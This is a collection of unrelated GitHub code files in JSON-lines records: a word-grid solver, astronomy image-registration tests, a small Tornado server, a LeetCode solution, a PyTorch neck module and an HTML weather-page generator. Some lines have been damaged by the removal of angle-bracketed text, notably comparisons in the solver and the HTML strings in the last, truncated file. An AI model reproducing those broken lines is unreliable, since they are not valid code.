[\n\t\t\t['a','t','m','o'],\n\t\t\t['p','i','n','k'],\n\t\t\t['h','g','e','c'],\n\t\t\t['a','l','b','u']\n\t\t]\n\t\t# self.g = self.grid[0]+self.grid[1]+self.grid[2]+self.grid[3]\n\t\tself.buf = []\n\t\tself.l = len(self.grid[0])\n\n\n\tdef save(self, k):\n\t\t# with open('output.csv','w',newline='') as file:\n\t\t\t# writer = csv.writer(file)\n\t\t\t# writer.writerow(self.dictionary[8])\n\t\tf = open(\"output.txt\", \"w\")\n\t\tfor i in k:\n\t\t\tf.write(i)\n\t\t\tf.write('\\n')\n\t\tf.close()\n\n\n\tdef filterFromDictionary(self):\n\t\twordList = []\n\t\t# get words starting from each cell\n\t\tfor i in range(16):\n\t\t\t# get words whose length is atleast 3 and atmost 6\n\t\t\tfor n in range(3,6):\n\t\t\t\t# get the words starting from ith cell and length of n\n\t\t\t\twordList += self.getWords(i,n)\n\t\t\t\tself.buf = []\n\t\twordList = list(dict.fromkeys(wordList))\n\t\t# print(len(wordList), wordList)\n\t\tfinal = []\n\t\tfor word in wordList:\n\t\t\tif word in self.dictionary:\n\t\t\t\tfinal.append(word)\n\n\t\tprint('found {} words'.format(len(final)))\n\t\treturn final\n\t\t\n\n\tdef getNeighbours(self, index):\n\t\t# \tint [][][] neighbours = {\n\t\t# {\n\t\t# {1,3,5,8},//0\n\t\t# {3,4,6,5}\n\t\t# },\n\t\t# {\n\t\t# {0,2,3,4,6,8,9},//1\n\t\t# {9,3,8,4,6,7,5}\n\t\t# },\n\t\t# {\n\t\t# {1,4,7,9},//2\n\t\t# {9,8,6,7}\n\t\t# },\n\t\t# {\n\t\t# {0,1,4,5,6,8,10,11},//3\n\t\t# {10,2,3,8,4,6,7,5}\n\t\t# },\n\t\t# {\n\t\t# {1,2,3,6,7,9,11,12},//4\n\t\t# {10,2,9,8,4,6,7,5}\n\t\t# },\n\t\t# {\n\t\t# {0,3,6,8,10,13},//5\n\t\t# {0,2,3,4,6,5}\n\t\t# },\n\t\t# {\n\t\t# {1,3,4,5,7,8,9,11,13,14},//6\n\t\t# {0,10,2,9,3,8,4,6,7,5}\n\t\t# },\n\t\t# {\n\t\t# {2,4,6,9,12,14},//7\n\t\t# {0,10,9,8,6,7}\n\t\t# },\n\t\t# {\n\t\t# {0,1,3,5,6,9,10,11,13,15,16},//8\n\t\t# {11,1,0,10,2,3,8,4,6,7,5}\n\t\t# },\n\t\t# {\n\t\t# {1,2,4,6,7,8,11,12,14,16,17},//9\n\t\t# {11,1,0,10,2,9,8,4,6,7,5}\n\t\t# },\n\t\t# {\n\t\t# {3,5,8,11,13,15},//10\n\t\t# {1,0,2,3,4,6}\n\t\t# },\n\t\t# {\n\t\t# {3,4,6,8,9,10,12,13,14,16},//11\n\t\t# {11,1,0,10,2,9,3,8,4,6}\n\t\t# },\n\t\t# {\n\t\t# {4,7,9,11,14,17},//12\n\t\t# {11,0,10,9,8,6}\n\t\t# },\n\t\t# {\n\t\t# {5,6,8,10,11,14,15,16},//13\n\t\t# {11,1,0,10,2,3,8,4}\n\t\t# },\n\t\t# {\n\t\t# {6,7,9,11,12,13,16,17},//14\n\t\t# {11,1,0,10,2,9,8,4}\n\t\t# },\n\t\t# {\n\t\t# {8,10,13,16},//15\n\t\t# {1,0,2,3}\n\t\t# },\n\t\t# {\n\t\t# {8,9,11,13,14,15,17},//16\n\t\t# {11,1,0,10,2,9,3}\n\t\t# },\n\t\t# {\n\t\t# {9,12,14,16},//17\n\t\t# {11,0,10,9}\n\t\t# }\n\t\t# };\n\t\tr = []\n\t\ti = int(index/self.l)\n\t\tj = index%self.l\n\t\tr += [ [i-1,j-1],[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j]]\n\t\tr2 = []\n\t\tfor k in r:\n\t\t\tif k[0]>=0 and k[0]=0 and k[1]2:\n\t\t\tself.buf.append(index)\n\t\t\tfor i in self.getNeighbours(index):\n\t\t\t\tif self.l*i[0]+i[1] not in self.buf:\n\t\t\t\t\ta = self.grid[int(index/self.l)][index%self.l]\n\t\t\t\t\tfor j in self.getWords(self.l*i[0]+i[1], num - 1):\n\t\t\t\t\t\ta+= j\n\t\t\t\t\t\twords.append(a)\n\t\t\t\t\t\t# print(self.buf)\n\t\t\t\t\t\ta = a[:-(len(j))]\n\t\t\tself.buf.pop()\n\t\telif num==2:\n\t\t\tfor i in self.getNeighbours(index):\n\t\t\t\tif self.l*i[0]+i[1] not in self.buf:\n\t\t\t\t\ta = self.grid[int(index/self.l)][index%self.l]\n\t\t\t\t\ta += self.grid[i[0]][i[1]]\n\t\t\t\t\twords.append(a)\n\n\t\treturn words\n\n\n\n\n\n\t\nif __name__=='__main__':\n\tt = time.time()\n\tT = TeluguPoti()\n\tT.save(T.filterFromDictionary())\n\tprint('time taken: {} seconds'.format(time.time()-t))\n\t# T.save(T.getWords(0,2))\n","repo_name":"SrikarSiddarth/Padakeli","sub_path":"wordFilter2.py","file_name":"wordFilter2.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"39436117892","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\r\n# flake8: noqa: F403, F405\r\n\r\nimport pytest\r\nimport numpy as np\r\nfrom astropop.image.register import AsterismRegister, \\\r\n CrossCorrelationRegister, \\\r\n register_framedata_list, \\\r\n compute_shift_list\r\nfrom astropop.framedata import FrameData, PixelMaskFlags\r\nfrom astropop.testing import *\r\n\r\nfrom .test_detection import gen_position_flux, gen_image\r\n\r\n\r\ndef gen_positions_transformed(x, y, flux, dx, dy, limits,\r\n rotation=None, rotation_center=None):\r\n \"\"\"Generate translated positions.\"\"\"\r\n x, y = x+dx, y+dy\r\n\r\n if rotation is not None:\r\n rotation_center = rotation_center or np.array(limits)/2\r\n cx, cy = rotation_center\r\n theta = np.deg2rad(rotation)\r\n nx = cx + (x-cx)*np.cos(theta) - (y-cy)*np.sin(theta)\r\n ny = cy + (x-cx)*np.sin(theta) + (y-cy)*np.cos(theta)\r\n x, y = nx, ny\r\n\r\n # ensure all positions are inside the image\r\n mask = x >= 0\r\n mask &= x <= limits[0]\r\n mask &= y >= 0\r\n mask &= y <= limits[1]\r\n where = np.where(mask)\r\n\r\n return x[where], y[where], flux[where]\r\n\r\n\r\nclass Test_AsterismRegister:\r\n @pytest.mark.parametrize('shift', [(25, 32), (-12, 5), (23.42, 12.43)])\r\n def test_compute_transform_translation(self, shift):\r\n size = (1024, 1024)\r\n sky = 800\r\n n = 100\r\n rdnoise = 5\r\n x, y, f = gen_position_flux(np.array(size)+80, n, 1e4, 4e6)\r\n x -= 40\r\n y -= 40\r\n sx, sy = shift\r\n\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, 0, 0, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n\r\n x2, y2, flux2 = gen_positions_transformed(x, y, f, sx, sy, size)\r\n im2 = gen_image(size, x2, y2, flux2,\r\n sky, rdnoise, sigma=2)\r\n\r\n ar = AsterismRegister()\r\n tform = ar._compute_transform(im1, im2)\r\n\r\n assert_almost_equal(tform.translation, shift, decimal=1)\r\n assert_almost_equal(tform.rotation, 0, decimal=3)\r\n assert_almost_equal(tform.scale, 1, decimal=4)\r\n\r\n def test_compute_transform_rotation(self):\r\n size = (1024, 1024)\r\n sky = 800\r\n n = 300\r\n rdnoise = 5\r\n x, y, f = gen_position_flux(2*np.array(size), n, 1e4, 4e6)\r\n x -= 500\r\n y -= 500\r\n\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, 0, 0, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n\r\n x2, y2, flux2 = gen_positions_transformed(x, y, f, 0, 0, size,\r\n rotation=35.2)\r\n im2 = gen_image(size, x2, y2, flux2,\r\n sky, rdnoise, sigma=2)\r\n\r\n ar = AsterismRegister()\r\n tform = ar._compute_transform(im1, im2)\r\n\r\n assert_almost_equal(tform.rotation, np.deg2rad(35.2), decimal=3)\r\n # the translation is needed due to the form skimage handles rotation\r\n assert_almost_equal(tform.translation, [388.7, -201.5], decimal=0)\r\n assert_almost_equal(tform.scale, 1, decimal=4)\r\n\r\n\r\nclass Test_CrossCorrelationRegister:\r\n @pytest.mark.parametrize('shift', [(25, 32), (-12, 5), (23.42, 12.43)])\r\n def test_compute_transform(self, shift):\r\n size = (1024, 1024)\r\n sky = 800\r\n n = 60\r\n rdnoise = 5\r\n x, y, f = gen_position_flux(np.array(size)+80, n, 1e4, 4e6)\r\n x -= 40\r\n y -= 40\r\n sx, sy = shift\r\n\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, 0, 0, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n\r\n x2, y2, flux2 = gen_positions_transformed(x, y, f, sx, sy, size)\r\n im2 = gen_image(size, x2, y2, flux2,\r\n sky, rdnoise, sigma=2)\r\n\r\n ccr = CrossCorrelationRegister(upsample_factor=10)\r\n tform = ccr._compute_transform(im1, im2)\r\n\r\n assert_almost_equal(tform.translation, shift, decimal=1)\r\n assert_almost_equal(tform.rotation, 0, decimal=3)\r\n assert_almost_equal(tform.scale, 1, decimal=4)\r\n\r\n\r\nclass Test_Registration:\r\n @pytest.mark.parametrize('cval,fill', [(0, 0),\r\n ('median', 1.0),\r\n ('mean', 1.51)])\r\n def test_register_image(self, cval, fill):\r\n im1 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 2, 6, 8, 6, 2, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n im2 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 2, 6, 8, 6, 2, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n expect = np.array(im1, dtype='f8')\r\n expect[0, :] = fill\r\n expect[:, -2:] = fill\r\n\r\n mask = np.zeros_like(im2, dtype=bool)\r\n mask[0, :] = 1\r\n mask[:, -2:] = 1\r\n\r\n ar = CrossCorrelationRegister()\r\n im_reg, mask_reg, tform = ar.register_image(np.array(im1), np.array(im2),\r\n cval=cval)\r\n\r\n assert_equal(im_reg, expect)\r\n assert_equal(mask_reg, mask)\r\n assert_equal(tform.translation, [2, -1])\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n @pytest.mark.parametrize('cval,fill', [(0, 0),\r\n ('median', 1.0),\r\n ('mean', 1.51)])\r\n def test_register_framedata(self, inplace, cval, fill):\r\n im1 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 2, 6, 8, 6, 2, 1, 1, 1, 1],\r\n [1, 2, 4, 6, 4, 2, 1, 1, 1, 1],\r\n [1, 1, 2, 2, 2, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n im2 = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 2, 6, 8, 6, 2, 1, 1],\r\n [1, 1, 1, 2, 4, 6, 4, 2, 1, 1],\r\n [1, 1, 1, 1, 2, 2, 2, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\r\n\r\n expect = np.array(im1, dtype='f8')\r\n expect[0, :] = fill\r\n expect[:, -2:] = fill\r\n\r\n mask = np.zeros_like(im2, dtype=bool)\r\n mask[0, :] = 1\r\n mask[:, -2:] = 1\r\n\r\n flags = np.zeros_like(im2, dtype='u1')\r\n flags[5, 5] = 5\r\n exp_flags = np.zeros_like(im2, dtype='u1')\r\n exp_flags[3, 6] = 5\r\n exp_flags[0, :] = (PixelMaskFlags.REMOVED |\r\n PixelMaskFlags.OUT_OF_BOUNDS).value\r\n exp_flags[:, -2:] = (PixelMaskFlags.REMOVED |\r\n PixelMaskFlags.OUT_OF_BOUNDS).value\r\n\r\n expect_unct = np.ones_like(im2, dtype='f8')\r\n expect_unct[0, :] = np.nan\r\n expect_unct[:, -2:] = np.nan\r\n\r\n frame1 = FrameData(im1, dtype='f8', flags=flags)\r\n frame1.meta['moving'] = False\r\n frame1.uncertainty = np.ones_like(im1)\r\n frame2 = FrameData(im2, dtype='f8', flags=flags)\r\n frame2.meta['moving'] = True\r\n frame2.uncertainty = np.ones_like(im2)\r\n\r\n ar = CrossCorrelationRegister()\r\n frame_reg = ar.register_framedata(frame1, frame2,\r\n cval=cval, inplace=inplace)\r\n\r\n assert_equal(frame_reg.data, expect)\r\n assert_equal(frame_reg.mask, mask)\r\n assert_equal(frame_reg.uncertainty, expect_unct)\r\n assert_equal(frame_reg.meta['astropop registration'],\r\n 'cross-correlation')\r\n assert_equal(frame_reg.meta['astropop registration_shift_x'], 2)\r\n assert_equal(frame_reg.meta['astropop registration_shift_y'], -1)\r\n assert_equal(frame_reg.meta['astropop registration_rot'], 0)\r\n assert_equal(frame_reg.meta['moving'], True)\r\n if inplace:\r\n assert_is(frame_reg, frame2)\r\n else:\r\n assert_is_not(frame_reg, frame2)\r\n\r\n def test_register_image_equal(self):\r\n im = gen_image((50, 50), [25], [25], [10000], 10, 0, sigma=3)\r\n ar = CrossCorrelationRegister()\r\n im_reg, mask_reg, tform = ar.register_image(im, im)\r\n assert_is(im_reg, im)\r\n assert_equal(im_reg, im)\r\n assert_equal(mask_reg, np.zeros_like(im))\r\n assert_equal(tform.translation, [0, 0])\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n def test_register_frame_equal(self, inplace):\r\n im = gen_image((50, 50), [25], [25], [10000], 10, 0, sigma=3)\r\n im = FrameData(im)\r\n flags = np.zeros((50, 50), dtype=np.uint8)\r\n flags[25, 25] = 5\r\n im.flags = flags\r\n ar = CrossCorrelationRegister()\r\n im_reg = ar.register_framedata(im, im, inplace=inplace)\r\n if inplace:\r\n assert_is(im_reg, im)\r\n else:\r\n assert_is_not(im_reg, im)\r\n assert_equal(im_reg.data, im.data)\r\n assert_equal(im_reg.mask, np.zeros_like(im))\r\n assert_equal(im_reg.flags, flags)\r\n assert_equal(im_reg.meta['astropop registration_shift_x'], 0)\r\n assert_equal(im_reg.meta['astropop registration_shift_y'], 0)\r\n\r\n\r\nclass Test_Register_FrameData_List:\r\n _shifts = [(0, 0), (-1, 22.4), (15.5, 3.2), (2.2, -1.75), (-5.4, 0.5)]\r\n\r\n def gen_frame_list(self, size):\r\n sky = 800\r\n rdnoise = 10\r\n n = 100\r\n x, y, f = gen_position_flux(np.array(size)+80, n, 1e4, 4e6)\r\n x -= 40\r\n y -= 40\r\n\r\n frame_list = []\r\n for shift in self._shifts:\r\n x1, y1, flux1 = gen_positions_transformed(x, y, f, *shift, size)\r\n im1 = gen_image(size, x1, y1, flux1,\r\n sky, rdnoise, sigma=2)\r\n frame = FrameData(im1, meta={'test expect_shift_x': shift[0],\r\n 'test expect_shift_y': shift[1]})\r\n frame_list.append(frame)\r\n\r\n return frame_list\r\n\r\n def test_error_unkown_algorithm(self):\r\n with pytest.raises(ValueError, match='Algorithm noexisting unknown.'):\r\n register_framedata_list([FrameData([[1]]) for i in range(10)],\r\n algorithm='noexisting')\r\n with pytest.raises(ValueError, match='Algorithm noexisting unknown.'):\r\n compute_shift_list([FrameData([[1]]) for i in range(10)],\r\n algorithm='noexisting')\r\n\r\n def test_error_non_framedata(self):\r\n with pytest.raises(TypeError, match='Only a list of FrameData'):\r\n register_framedata_list([np.zeros((10, 10)) for i in range(10)])\r\n with pytest.raises(TypeError, match='Only a list of FrameData'):\r\n compute_shift_list([np.zeros((10, 10)) for i in range(10)])\r\n\r\n def test_error_non_iterable_list(self):\r\n with pytest.raises(TypeError):\r\n register_framedata_list(10)\r\n with pytest.raises(TypeError):\r\n compute_shift_list(10)\r\n\r\n def test_error_incompatible_shapes(self):\r\n frame_list = [FrameData(np.zeros((i+1, i+1))) for i in range(10)]\r\n with pytest.raises(ValueError, match='incompatible shapes'):\r\n register_framedata_list(frame_list)\r\n with pytest.raises(ValueError, match='incompatible shapes'):\r\n compute_shift_list(frame_list)\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n def test_register_framedata_crosscorr(self, inplace):\r\n frame_list = self.gen_frame_list((1024, 1024))\r\n reg_list = register_framedata_list(frame_list,\r\n algorithm='cross-correlation',\r\n inplace=inplace,\r\n upsample_factor=10, space='real')\r\n assert_equal(len(frame_list), len(reg_list))\r\n for org, reg in zip(frame_list, reg_list):\r\n if inplace:\r\n assert_is(org, reg)\r\n else:\r\n assert_is_not(org, reg)\r\n for i in ['x', 'y']:\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}']\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n\r\n if not inplace:\r\n shift_list = compute_shift_list(frame_list,\r\n algorithm='cross-correlation',\r\n upsample_factor=10, space='real')\r\n assert_equal(len(frame_list), len(shift_list))\r\n assert_almost_equal(shift_list, self._shifts, decimal=0)\r\n\r\n @pytest.mark.parametrize('inplace', [True, False])\r\n def test_register_framedata_asterism(self, inplace):\r\n frame_list = self.gen_frame_list((1024, 1024))\r\n reg_list = register_framedata_list(frame_list,\r\n algorithm='asterism-matching',\r\n inplace=inplace,\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(reg_list))\r\n for org, reg in zip(frame_list, reg_list):\r\n if inplace:\r\n assert_is(org, reg)\r\n else:\r\n assert_is_not(org, reg)\r\n for i in ['x', 'y']:\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}']\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n\r\n if not inplace:\r\n shift_list = compute_shift_list(frame_list,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(shift_list))\r\n assert_almost_equal(shift_list, self._shifts, decimal=0)\r\n\r\n def test_register_framedata_list_ref_image(self):\r\n frame_list = self.gen_frame_list((1024, 1024))\r\n reg_list = register_framedata_list(frame_list,\r\n algorithm='asterism-matching',\r\n ref_image=4,\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(reg_list))\r\n ref_shift = np.array(self._shifts[4])\r\n\r\n for org, reg in zip(frame_list, reg_list):\r\n for i, ref in zip(['x', 'y'], ref_shift):\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}'] - ref\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n\r\n shift_list = compute_shift_list(frame_list,\r\n ref_image=4,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5)\r\n assert_equal(len(frame_list), len(shift_list))\r\n assert_almost_equal(shift_list, self._shifts - ref_shift, decimal=0)\r\n\r\n def test_register_framedata_list_clip(self):\r\n frame_list = self.gen_frame_list((512, 1024))\r\n reg_list = register_framedata_list(frame_list, clip_output=True,\r\n inplace=True,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5)\r\n\r\n assert_equal(len(frame_list), len(reg_list))\r\n for org, reg in zip(frame_list, reg_list):\r\n assert_is(org, reg)\r\n for i in ['x', 'y']:\r\n ap_reg_shift = reg.meta[f'astropop registration_shift_{i}']\r\n ex_reg_shift = org.meta[f'test expect_shift_{i}']\r\n assert_almost_equal(ap_reg_shift, ex_reg_shift, decimal=0)\r\n assert_equal(reg.meta['astropop trimmed_section'], '6:-16,2:-23')\r\n # x: 6:-16, y: 2:-23\r\n assert_equal(reg.shape, (1024-23-2, 512-6-16))\r\n # no masked pixel should remain\r\n assert_false(np.any(reg.mask))\r\n\r\n def test_register_framedata_list_skip_failure_default(self):\r\n # defult behavior is raise error\r\n frame_list = self.gen_frame_list((512, 1024))\r\n frame_list[2].data = np.ones((1024, 512))\r\n\r\n with pytest.raises(ValueError):\r\n register_framedata_list(frame_list, algorithm='asterism-matching')\r\n\r\n with pytest.raises(ValueError):\r\n compute_shift_list(frame_list, algorithm='asterism-matching')\r\n\r\n def test_register_framedata_list_skip_failure_false(self):\r\n frame_list = self.gen_frame_list((512, 1024))\r\n frame_list[2].data = np.ones((1024, 512))\r\n\r\n with pytest.raises(ValueError):\r\n register_framedata_list(frame_list, algorithm='asterism-matching',\r\n skip_failure=False)\r\n\r\n with pytest.raises(ValueError):\r\n compute_shift_list(frame_list, algorithm='asterism-matching',\r\n skip_failure=False)\r\n\r\n @pytest.mark.parametrize('cval,expct_cval', [(np.nan, np.nan),\r\n ('median', 1),\r\n ('mean', 1),\r\n (0, 0)])\r\n def test_register_framedata_list_skip_failure_true(self, cval, expct_cval):\r\n frame_list = self.gen_frame_list((512, 1024))\r\n frame_list[2].data = np.ones((1024, 512))\r\n\r\n reg_list = register_framedata_list(frame_list, clip_output=True,\r\n inplace=False,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5,\r\n cval=cval,\r\n skip_failure=True)\r\n\r\n assert_equal(len(frame_list), len(reg_list))\r\n assert_is_none(reg_list[2].meta['astropop registration_shift_x'])\r\n assert_is_none(reg_list[2].meta['astropop registration_shift_y'])\r\n assert_is_none(reg_list[2].meta['astropop registration_rot'])\r\n assert_equal(reg_list[2].meta['astropop registration'], 'failed')\r\n assert_equal(reg_list[2].data, np.full(reg_list[2].shape, expct_cval))\r\n assert_true(np.all(reg_list[2].mask))\r\n\r\n for org, reg in zip(frame_list, reg_list):\r\n assert_equal(reg.meta['astropop trimmed_section'], '6:-3,2:-23')\r\n # x: 6:-3, y: 2:-23, since frame[2] is not available\r\n assert_equal(reg.shape, (1024-23-2, 512-6-3))\r\n\r\n shift_list = compute_shift_list(frame_list,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5,\r\n skip_failure=True)\r\n shift_list_expt = np.array(self._shifts)\r\n shift_list_expt[2][:] = np.nan\r\n assert_almost_equal(shift_list, shift_list_expt, decimal=1)\r\n","repo_name":"juliotux/astropop","sub_path":"tests/test_image_register.py","file_name":"test_image_register.py","file_ext":"py","file_size_in_byte":20662,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"86"} +{"seq_id":"73759553244","text":"## pip3 install tornado\n\nimport tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n self.write(\"下面是\" + self.get_argument('id') + \"的年度图书报告:123123123123123\")\n\napplication = tornado.web.Application([\n (r\"/library_annual_report/query\", MainHandler),\n])\n\nif __name__ == \"__main__\":\n application.listen(8080)\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"chuqingq/codeeveryday","sub_path":"python/20180304_wq_library_annual_report/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"26735212904","text":"class Solution:\n def getHint(self, secret: str, guess: str) -> str:\n countA = countB = 0\n dic = defaultdict(int)\n # store the secret to dic and calculate countA\n for i in range(len(secret)):\n if secret[i] == guess[i]:\n countA += 1\n dic[secret[i]] += 1\n # compare the guess with the secret and calculate countB\n for c in guess:\n if c in dic and dic[c] > 0:\n dic[c] -= 1\n countB += 1\n # don't forget to minus countA\n countB -= countA\n return str(countA) + \"A\" + str(countB) + \"B\"\n ","repo_name":"BSanandu88/Coding-questions","sub_path":"299-bulls-and-cows/299-bulls-and-cows.py","file_name":"299-bulls-and-cows.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"40146498362","text":"'''\nAuthor : Thyssen Wen\nDate : 2022-11-19 14:41:52\nLastEditors : Thyssen Wen\nLastEditTime : 2022-11-21 13:15:37\nDescription : file content\nFilePath : /SVTAS/svtas/model/necks/unsample_decoder_neck.py\n'''\nimport torch\nimport copy\nimport random\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mmcv.cnn import constant_init, kaiming_init\nfrom ..builder import NECKS\n\nclass Adaptive3DTo1DPooling(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n\n def forward(self, x):\n # x [N C T H W]\n _, c, t, _, _ = x.shape\n return F.adaptive_avg_pool3d(x, [t, 1, 1]).squeeze(-1).squeeze(-1)\n\nclass Up1DConv(nn.Module):\n def __init__(self, in_channel, reduce_factor=2) -> None:\n super().__init__()\n self.up = nn.Upsample(scale_factor = 2)\n self.conv = nn.Sequential(\n nn.Conv1d(in_channel, in_channel // reduce_factor, 3, padding=1, dilation=1),\n nn.ReLU(),\n # nn.Conv1d(in_channel // reduce_factor, in_channel // reduce_factor, 3, padding=2, dilation=2),\n # nn.ReLU(),\n nn.BatchNorm1d(in_channel // 2))\n self.pool = Adaptive3DTo1DPooling()\n \n def forward(self, x1, x2):\n x1 = self.up(x1)\n x2 = self.pool(x2)\n x = torch.cat([x1, x2], dim=1)\n x = self.conv(x)\n return x\n\n@NECKS.register()\nclass UnsampleDecoderNeck(nn.Module):\n def __init__(self,\n in_channels_list=[3072, 2048, 1280],\n reduce_factor=2) -> None:\n super().__init__()\n self.layers = nn.ModuleList([\n Up1DConv(in_channel=in_channel, reduce_factor=reduce_factor)\n for in_channel in in_channels_list\n ])\n self.pool = Adaptive3DTo1DPooling()\n \n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv1d) or isinstance(m, nn.Conv2d):\n kaiming_init(m)\n\n def _clear_memory_buffer(self):\n pass\n\n def forward(self, x, masks):\n x_out = self.pool(x[len(x) - 1])\n for i, layer in zip(range(len(x) - 1), self.layers):\n x_out = layer(x_out, x[len(x) - 2 - i])\n return x_out * masks","repo_name":"Thinksky5124/SVTAS","sub_path":"svtas/model/necks/unsample_decoder_neck.py","file_name":"unsample_decoder_neck.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"86"} +{"seq_id":"6440098963","text":"from user_interface import temperature_view # импортируем методы(чтобы не использ библиотеки) из модуля user_interface\r\nfrom user_interface import wind_speed_view\r\nfrom user_interface import pressure_view\r\n\r\ndef create(device = 1): # метод получает в аргументе device = 1(в качетсве демонстрации,\r\n # т/е из первого девайса берется значение)\r\n style = 'style=\"font-size:30px;\"' # стиль в конечном html представлении шрифт 30\r\n html = '\\n \\n \\n' # заготовка для html представления\r\n html += '

Temperature: {} c

\\n'\\\r\n .format(style, temperature_view(device)) # обычная строка, которая форматируется: в качестве температуры мы вставляем значение этой темп-ры, полученное из view\r\n html += '

Wind_speed: {} m/s

\\n'\\\r\n .format(style, wind_speed_view(device))\r\n html += '

Pressure: {} mmHg

\\n'\\\r\n .format(style, pressure_view(device))\r\n html += ' \\n'\r\n \r\n with open('index.html', 'w') as page: # создаем файл index.html\r\n page.write(html) # сохраняем файл index.html\r\n\r\n return html\r\n\r\n\r\n\r\ndef new_create(data ,device = 1): # создадим метод получения трех измерений в html представлении, доп аргумент data \r\n t, p, w = data # данные о темп давл и скор ветра \r\n style = 'style=\"font-size:30px;\"'\r\n html = '\\n \\n \\n'\r\n html += '

Temperature: {} c

\\n'\\\r\n .format(style, t) # вместо явного вызова метода temperature_view указываем t\r\n html += '

Wind_speed: {} m/s

\\n'\\\r\n .format(style, w)\r\n html += '

Pressure: {} mmHg

